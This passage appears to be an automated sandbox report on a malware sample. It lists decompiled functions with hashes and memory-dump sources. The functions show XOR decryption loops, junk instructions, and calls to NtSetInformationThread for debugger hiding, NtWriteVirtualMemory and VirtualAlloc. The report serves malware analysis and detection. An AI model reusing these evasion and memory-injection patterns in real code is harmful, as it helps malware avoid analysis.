Instruction Fuzzy Hash: 0A3129317403349AEB24BA788CC579F37B6AF68764FA00525EE56A75C1D770C48DCA42

Uniqueness

Uniqueness Score: -1.00%

Function 02320863, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 54d235cc2389eeceffc7f97c1204aac3b26fb01bd5ebe8f8d04802116519e40f
Instruction ID: f32bcdf0e0833e7b00a3b6122b69c6373a4b15e64e72daf2e31fb711835e69f9
Opcode Fuzzy Hash: 54d235cc2389eeceffc7f97c1204aac3b26fb01bd5ebe8f8d04802116519e40f
Instruction Fuzzy Hash: D72148752003348BEB24BEB88CC479E37B6AF58720F600529ED52A7581D720C4CDCB42

Uniqueness

Uniqueness Score: -1.00%

Function 02323764, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,-00002000,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02323833

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationMemoryThreadVirtualWrite
String ID: TM
API String ID: 1809272239-847983073
Opcode ID: 74bc34c87c735d0b8aa29a02bce5a48feedc659dc7637b0b4ad1dad69af6c931
Instruction ID: 0281aac8427c2a10f4a410d62b3654e9de308515aa642bf49937cc2ac0fbefbf
Opcode Fuzzy Hash: 74bc34c87c735d0b8aa29a02bce5a48feedc659dc7637b0b4ad1dad69af6c931
Instruction Fuzzy Hash: E2210378680219AFEF356E28CDC1BE93A67FF05310F948024EE85A7151C77988CD9F41

Uniqueness

Uniqueness Score: -1.00%

Function 02320830, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Strings

1.!T, xrefs: 02320890

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 78092200af1c788944b43ed927f58389bdf634c364ea6354f6a90bfa7d1460d4
Instruction ID: 6e46c8cc74f3863bee19adbbb925f0c42d690ebc85d3582130c295f7909ae795
Opcode Fuzzy Hash: 78092200af1c788944b43ed927f58389bdf634c364ea6354f6a90bfa7d1460d4
Instruction Fuzzy Hash: E42146753403349AEB24BAB88CC079F33BA9F69760FA00525ED52D7680D760C48CCA52

Uniqueness

Uniqueness Score: -1.00%

Function 02323818, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,-00002000,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02323833

Strings

TM, xrefs: 023238BD

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: InformationMemoryThreadVirtualWrite
String ID: TM
API String ID: 1809272239-847983073
Opcode ID: 3a07d13a4e32a9ea3868449cc0a8ecf66cd958974aa36d43ef2a867261505cdd
Instruction ID: dc5faf5b65ba3e2b8321b14d78c9787e153d1f748e0112cc42afbbb2ee7afc92
Opcode Fuzzy Hash: 3a07d13a4e32a9ea3868449cc0a8ecf66cd958974aa36d43ef2a867261505cdd
Instruction Fuzzy Hash: 6111CE78A80219AFEF352E24DD80BE83B67FF16310FA48064EEC466151C73A88DD9F51

Uniqueness

Uniqueness Score: -1.00%

Function 00406201, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 381
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00406201() {
				void* _t10;
				signed int _t35;
				signed int _t36;
				intOrPtr* _t43;
				signed int* _t44;
				unsigned int _t45;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t48;
				unsigned int _t49;
				unsigned int _t50;
				unsigned int _t51;
				unsigned int _t52;
				unsigned int _t53;
				unsigned int _t54;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t57;

				while(1) {
					_t47 = _t46;
					_t35 =  *_t44;
					_t48 = _t47 >> 0;
					_t36 = _t35 ^ _t48;
					asm("cld");
					_t45 = _t48 >> 0;
					if(_t36 != _t10) {
						_t46 = _t45 + 1;
						continue;
					}
					asm("cld");
					_t49 = _t45;
					asm("cld");
					asm("cld");
					_t50 = _t49 >> 0;
					asm("cld");
					asm("cld");
					_t51 = _t50;
					_t52 = _t51 >> 0;
					_t43 =  *((intOrPtr*)(0x401014));
					do {
						_t53 = _t52 >> 0;
						_t54 = _t53;
						_t43 = _t43 - 1;
						asm("cld");
						asm("cld");
						_t55 = _t54 >> 0;
						asm("cld");
						_t56 = _t55;
						_t57 = _t56 >> 0;
						_t52 = _t57 >> 0;
					} while ( *_t43 != 0xffcc88ea);
					asm("out dx, eax");
					_push(ss);
					asm("cld");
					while(1) {
						asm("cld");
					}
				}
			}

0x00406234
0x0040625c
0x004062d1
0x004062d3
0x0040639e
0x004063a5
0x004063f1
0x00406400
0x004061fa
0x00000000
0x004061fa
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca
0x00406cce

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Strings

&33, xrefs: 00406233

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: &33
API String ID: 4275171209-1545879298
Opcode ID: 8cace2688412c89170d997cafd6e5a7494cf904b2ace07db160c378125e44010
Instruction ID: e4da795afb238444048a2d08aa0eb96afd7a7fa8dae1d7432ed6901fafdef895
Opcode Fuzzy Hash: 8cace2688412c89170d997cafd6e5a7494cf904b2ace07db160c378125e44010
Instruction Fuzzy Hash: D9B126B2F4E111CBE3644A50A840B307A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92, Relevance: 1.7, APIs: 1, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4253c373472d8e6d281be1203ecdb0e12ad6d9546134968f1ad801cd29aaef7
Instruction ID: 23c8332f48f4f9ea207c4fe16ebae45db97d26f33b756b7c1c094b4900c9568c
Opcode Fuzzy Hash: a4253c373472d8e6d281be1203ecdb0e12ad6d9546134968f1ad801cd29aaef7
Instruction Fuzzy Hash: 30E179B2F4E101CBE3245A10A8407717A31AB53304FB365BB89077A6D2D77D6963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 0040604C, Relevance: 1.7, APIs: 1, Instructions: 429
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E0040604C() {
				void* _t10;
				void* _t11;
				void* _t12;
				signed int _t48;
				signed int _t49;
				intOrPtr* _t56;
				unsigned int _t58;
				unsigned int _t59;
				unsigned int _t60;
				unsigned int _t61;
				unsigned int _t62;
				unsigned int _t63;
				unsigned int _t64;
				unsigned int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int _t68;
				unsigned int _t69;
				unsigned int _t70;
				unsigned int _t71;
				unsigned int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int _t75;

				_t59 = _t58 >> 0;
				_pop(_t10);
				_t60 = _t59 >> 0;
				_t11 = _t10 - 0xdbc95043;
				_t61 = _t60;
				_t62 = _t61 >> 0;
				_t12 = _t11 - 0x29;
				_t63 = _t62;
				do {
					_t64 = _t63 + 1;
					_t65 = _t64;
					_t48 =  *0x407a5c;
					_t66 = _t65 >> 0;
					_t49 = _t48 ^ _t66;
					asm("cld");
					_t63 = _t66 >> 0;
				} while (_t49 != _t12);
				asm("cld");
				_t67 = _t63;
				asm("cld");
				asm("cld");
				_t68 = _t67 >> 0;
				asm("cld");
				asm("cld");
				_t69 = _t68;
				_t70 = _t69 >> 0;
				_t56 =  *((intOrPtr*)(0x401014));
				do {
					_t71 = _t70 >> 0;
					_t72 = _t71;
					_t56 = _t56 - 1;
					asm("cld");
					asm("cld");
					_t73 = _t72 >> 0;
					asm("cld");
					_t74 = _t73;
					_t75 = _t74 >> 0;
					_t70 = _t75 >> 0;
				} while ( *_t56 != 0xffcc88ea);
				asm("out dx, eax");
				_push(ss);
				asm("cld");
				while(1) {
					asm("cld");
				}
			}

0x00406077
0x00406097
0x004060c5
0x004060f7
0x0040611d
0x0040613c
0x0040615e
0x00406177
0x004061de
0x004061fa
0x0040625c
0x004062d1
0x004062d3
0x0040639e
0x004063a5
0x004063f1
0x004063fe
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0fb89791177c28d98d2a04579d44095760ce8940b723f14eaa8aac9097acc322
Instruction ID: 525f2336c42af9fe20b707597766374a2e43bc26375e34c790617159aea4b202
Opcode Fuzzy Hash: 0fb89791177c28d98d2a04579d44095760ce8940b723f14eaa8aac9097acc322
Instruction Fuzzy Hash: 7BC127B2F4E111CBE3645A50A840B307A31AB43304FB365BB89077A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 0040609A, Relevance: 1.7, APIs: 1, Instructions: 416
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 17%

			E0040609A() {
				void* _t10;
				void* _t11;
				void* _t12;
				signed int _t26;
				signed int _t27;
				intOrPtr* _t34;
				unsigned int _t36;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				unsigned int _t42;
				unsigned int _t43;
				unsigned int _t44;
				unsigned int _t45;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t48;
				unsigned int _t49;
				unsigned int _t50;
				unsigned int _t51;
				unsigned int _t52;

				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				asm("aaa");
				_t37 = _t36 >> 0;
				_t11 = _t10 - 0xdbc95043;
				_t38 = _t37;
				_t39 = _t38 >> 0;
				_t12 = _t11 - 0x29;
				_t40 = _t39;
				do {
					_t41 = _t40 + 1;
					_t42 = _t41;
					_t26 =  *0x407a5c;
					_t43 = _t42 >> 0;
					_t27 = _t26 ^ _t43;
					asm("cld");
					_t40 = _t43 >> 0;
				} while (_t27 != _t12);
				asm("cld");
				_t44 = _t40;
				asm("cld");
				asm("cld");
				_t45 = _t44 >> 0;
				asm("cld");
				asm("cld");
				_t46 = _t45;
				_t47 = _t46 >> 0;
				_t34 =  *((intOrPtr*)(0x401014));
				do {
					_t48 = _t47 >> 0;
					_t49 = _t48;
					_t34 = _t34 - 1;
					asm("cld");
					asm("cld");
					_t50 = _t49 >> 0;
					asm("cld");
					_t51 = _t50;
					_t52 = _t51 >> 0;
					_t47 = _t52 >> 0;
				} while ( *_t34 != 0xffcc88ea);
				asm("out dx, eax");
				_push(ss);
				asm("cld");
				while(1) {
					asm("cld");
				}
			}

0x0040609a
0x0040609b
0x0040609c
0x0040609d
0x0040609e
0x0040609f
0x004060a0
0x004060a1
0x004060a2
0x004060a3
0x004060a4
0x004060a5
0x004060a6
0x004060a7
0x004060a8
0x004060a9
0x004060aa
0x004060ab
0x004060ac
0x004060ad
0x004060ae
0x004060af
0x004060b0
0x004060b1
0x004060b2
0x004060b3
0x004060b4
0x004060b5
0x004060b6
0x004060b7
0x004060b8
0x004060b9
0x004060ba
0x004060bb
0x004060bc
0x004060bd
0x004060be
0x004060bf
0x004060c0
0x004060c5
0x004060f7
0x0040611d
0x0040613c
0x0040615e
0x00406177
0x004061de
0x004061fa
0x0040625c
0x004062d1
0x004062d3
0x0040639e
0x004063a5
0x004063f1
0x004063fe
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 302ab2c25fe20731c142743750a46f7d272ef8449fa5b8a1a482cbfe9b0576a2
Instruction ID: c6bdd790c0940a9ce39aa7a29e70beba8a3e373240f2408e98d734f2e74001e7
Opcode Fuzzy Hash: 302ab2c25fe20731c142743750a46f7d272ef8449fa5b8a1a482cbfe9b0576a2
Instruction Fuzzy Hash: 61C127B2F4E111CBE3645A50A840B307A31AB43304FB365BB89073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 0040600D, Relevance: 1.7, APIs: 1, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd17a44d415072ef12131dca7090f4876bcb235d8dd54616f48014fc773f7cd
Instruction ID: 7bd6da30251a318380ea87f81fccddd0ddfe7d9f78f6f56aff27a91e6905c12c
Opcode Fuzzy Hash: ebd17a44d415072ef12131dca7090f4876bcb235d8dd54616f48014fc773f7cd
Instruction Fuzzy Hash: 1CC138B2F4E111CBE3644A50A8407307A31AB43304FB365BB89077A5D6D77D6963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 00406432, Relevance: 1.6, APIs: 1, Instructions: 398
COMMONCrypto

Download Yara Rule

C-Code - Quality: 42%

			E00406432() {
				intOrPtr* _t30;
				unsigned int _t31;
				unsigned int _t32;
				unsigned int _t33;
				unsigned int _t34;
				unsigned int _t35;
				unsigned int _t36;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;

				asm("cld");
				_t32 = _t31;
				asm("cld");
				asm("cld");
				_t33 = _t32 >> 0;
				asm("cld");
				asm("cld");
				_t34 = _t33;
				_t35 = _t34 >> 0;
				_t30 =  *((intOrPtr*)(0x401014));
				do {
					_t36 = _t35 >> 0;
					_t37 = _t36;
					_t30 = _t30 - 1;
					asm("cld");
					asm("cld");
					_t38 = _t37 >> 0;
					asm("cld");
					_t39 = _t38;
					_t40 = _t39 >> 0;
					_t35 = _t40 >> 0;
				} while ( *_t30 != 0xffcc88ea);
				asm("out dx, eax");
				_push(ss);
				asm("cld");
				while(1) {
					asm("cld");
				}
			}

0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 994c72e7517f652db21fe4c79e2d90f1f3806bef0746f5bec16d3e4a64d8f454
Instruction ID: aaefa68414a471c5cd9f6e8e32c08d73cd4a1f43465e72d25b7beb223251e90d
Opcode Fuzzy Hash: 994c72e7517f652db21fe4c79e2d90f1f3806bef0746f5bec16d3e4a64d8f454
Instruction Fuzzy Hash: D8B159B2F4E511CBE3604A14A840B317631AB43314FB765BB89073A6D2D77D6823BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 00406141, Relevance: 1.6, APIs: 1, Instructions: 391
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00406141() {
				signed int _t11;
				signed int _t12;
				void* _t13;
				void* _t21;
				signed int _t27;
				signed int _t28;
				intOrPtr* _t35;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				unsigned int _t42;
				unsigned int _t43;
				unsigned int _t44;
				unsigned int _t45;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t48;
				unsigned int _t49;
				unsigned int _t50;

				_t12 = _t11 &  *(_t21 + 0x14eb29e8);
				_t13 = _t12 - 0x29;
				_t38 = _t37;
				do {
					_t39 = _t38 + 1;
					_t40 = _t39;
					_t27 =  *0x407a5c;
					_t41 = _t40 >> 0;
					_t28 = _t27 ^ _t41;
					asm("cld");
					_t38 = _t41 >> 0;
				} while (_t28 != _t13);
				asm("cld");
				_t42 = _t38;
				asm("cld");
				asm("cld");
				_t43 = _t42 >> 0;
				asm("cld");
				asm("cld");
				_t44 = _t43;
				_t45 = _t44 >> 0;
				_t35 =  *((intOrPtr*)(0x401014));
				do {
					_t46 = _t45 >> 0;
					_t47 = _t46;
					_t35 = _t35 - 1;
					asm("cld");
					asm("cld");
					_t48 = _t47 >> 0;
					asm("cld");
					_t49 = _t48;
					_t50 = _t49 >> 0;
					_t45 = _t50 >> 0;
				} while ( *_t35 != 0xffcc88ea);
				asm("out dx, eax");
				_push(ss);
				asm("cld");
				while(1) {
					asm("cld");
				}
			}

0x0040615d
0x0040615e
0x00406177
0x004061de
0x004061fa
0x0040625c
0x004062d1
0x004062d3
0x0040639e
0x004063a5
0x004063f1
0x004063fe
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: afc2feb6f3c1bf1513327029908b0a3b5f3109fd6f83850e1a174a29cea6f2b5
Instruction ID: efc48031da944cc2fcb584d607b4d3d956cd50430e3bbc3e1ba3670f0299992c
Opcode Fuzzy Hash: afc2feb6f3c1bf1513327029908b0a3b5f3109fd6f83850e1a174a29cea6f2b5
Instruction Fuzzy Hash: DCC127B2F4E111CBE3245A50A840B317A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004061BC, Relevance: 1.6, APIs: 1, Instructions: 391memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e44f11c72f91ff742b57aca16c5976af37c50454082049117002915da96b5dda
Instruction ID: c34712d9a726e4fdb2ae6bfdf42003b37333558d907abe0e261e5f7288aba0b3
Opcode Fuzzy Hash: e44f11c72f91ff742b57aca16c5976af37c50454082049117002915da96b5dda
Instruction Fuzzy Hash: 13B128B2F4E111CBE3645A50A840B307A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 00406261, Relevance: 1.6, APIs: 1, Instructions: 383
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00406261() {
				void* _t76;
				signed int _t90;
				signed int _t91;
				intOrPtr* _t98;
				signed int* _t99;
				unsigned int _t100;
				unsigned int _t101;
				unsigned int _t102;
				unsigned int _t103;
				unsigned int _t104;
				unsigned int _t105;
				unsigned int _t106;
				unsigned int _t107;
				unsigned int _t108;
				unsigned int _t109;
				unsigned int _t110;
				unsigned int _t111;
				unsigned int _t112;

				while(1) {
					_t90 =  *_t99;
					_t103 = _t102 >> 0;
					_t91 = _t90 ^ _t103;
					asm("cld");
					_t100 = _t103 >> 0;
					if(_t91 != _t76) {
						_t101 = _t100 + 1;
						_t102 = _t101;
						continue;
					}
					asm("cld");
					_t104 = _t100;
					asm("cld");
					asm("cld");
					_t105 = _t104 >> 0;
					asm("cld");
					asm("cld");
					_t106 = _t105;
					_t107 = _t106 >> 0;
					_t98 =  *((intOrPtr*)(0x401014));
					do {
						_t108 = _t107 >> 0;
						_t109 = _t108;
						_t98 = _t98 - 1;
						asm("cld");
						asm("cld");
						_t110 = _t109 >> 0;
						asm("cld");
						_t111 = _t110;
						_t112 = _t111 >> 0;
						_t107 = _t112 >> 0;
					} while ( *_t98 != 0xffcc88ea);
					asm("out dx, eax");
					_push(ss);
					asm("cld");
					while(1) {
						asm("cld");
					}
				}
			}

0x004062a3
0x004062d1
0x004062d3
0x0040639e
0x004063a5
0x004063f1
0x00406400
0x004061fa
0x0040625c
0x00000000
0x0040625c
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca
0x00406cce

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3f9b2fe5f1606895b3b137c07740bebd18571a03c59c84568a12e93c852a37e8
Instruction ID: 37562913e50fdf386ce20203923ed26c31cd4251e3a5bc78ee3c25f78e74f135
Opcode Fuzzy Hash: 3f9b2fe5f1606895b3b137c07740bebd18571a03c59c84568a12e93c852a37e8
Instruction Fuzzy Hash: 29B118B2F4E111CBE3644A50A840B317A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004061E0, Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 21%

			E004061E0() {
				void* _t10;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t32;
				signed int* _t33;
				unsigned int _t34;
				unsigned int _t35;
				unsigned int _t36;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				unsigned int _t42;
				unsigned int _t43;
				unsigned int _t44;
				unsigned int _t45;
				unsigned int _t46;

				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				asm("sti");
				while(1) {
					_t35 = _t34 + 1;
					_t36 = _t35;
					_t24 =  *_t33;
					_t37 = _t36 >> 0;
					_t25 = _t24 ^ _t37;
					asm("cld");
					_t34 = _t37 >> 0;
					if(_t25 != _t10) {
						continue;
					}
					asm("cld");
					_t38 = _t34;
					asm("cld");
					asm("cld");
					_t39 = _t38 >> 0;
					asm("cld");
					asm("cld");
					_t40 = _t39;
					_t41 = _t40 >> 0;
					_t32 =  *((intOrPtr*)(0x401014));
					do {
						_t42 = _t41 >> 0;
						_t43 = _t42;
						_t32 = _t32 - 1;
						asm("cld");
						asm("cld");
						_t44 = _t43 >> 0;
						asm("cld");
						_t45 = _t44;
						_t46 = _t45 >> 0;
						_t41 = _t46 >> 0;
					} while ( *_t32 != 0xffcc88ea);
					asm("out dx, eax");
					_push(ss);
					asm("cld");
					while(1) {
						asm("cld");
					}
				}
			}

0x004061e0
0x004061e1
0x004061e2
0x004061e3
0x004061e4
0x004061e5
0x004061e6
0x004061e7
0x004061e8
0x004061e9
0x004061ea
0x004061eb
0x004061ec
0x004061ed
0x004061ee
0x004061ef
0x004061f0
0x004061f1
0x004061f2
0x004061f3
0x004061f4
0x004061f5
0x004061f6
0x004061f7
0x004061f8
0x004061f9
0x004061fa
0x004061fa
0x0040625c
0x004062d1
0x004062d3
0x0040639e
0x004063a5
0x004063f1
0x00406400
0x00000000
0x004061de
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca
0x00406cce

APIs

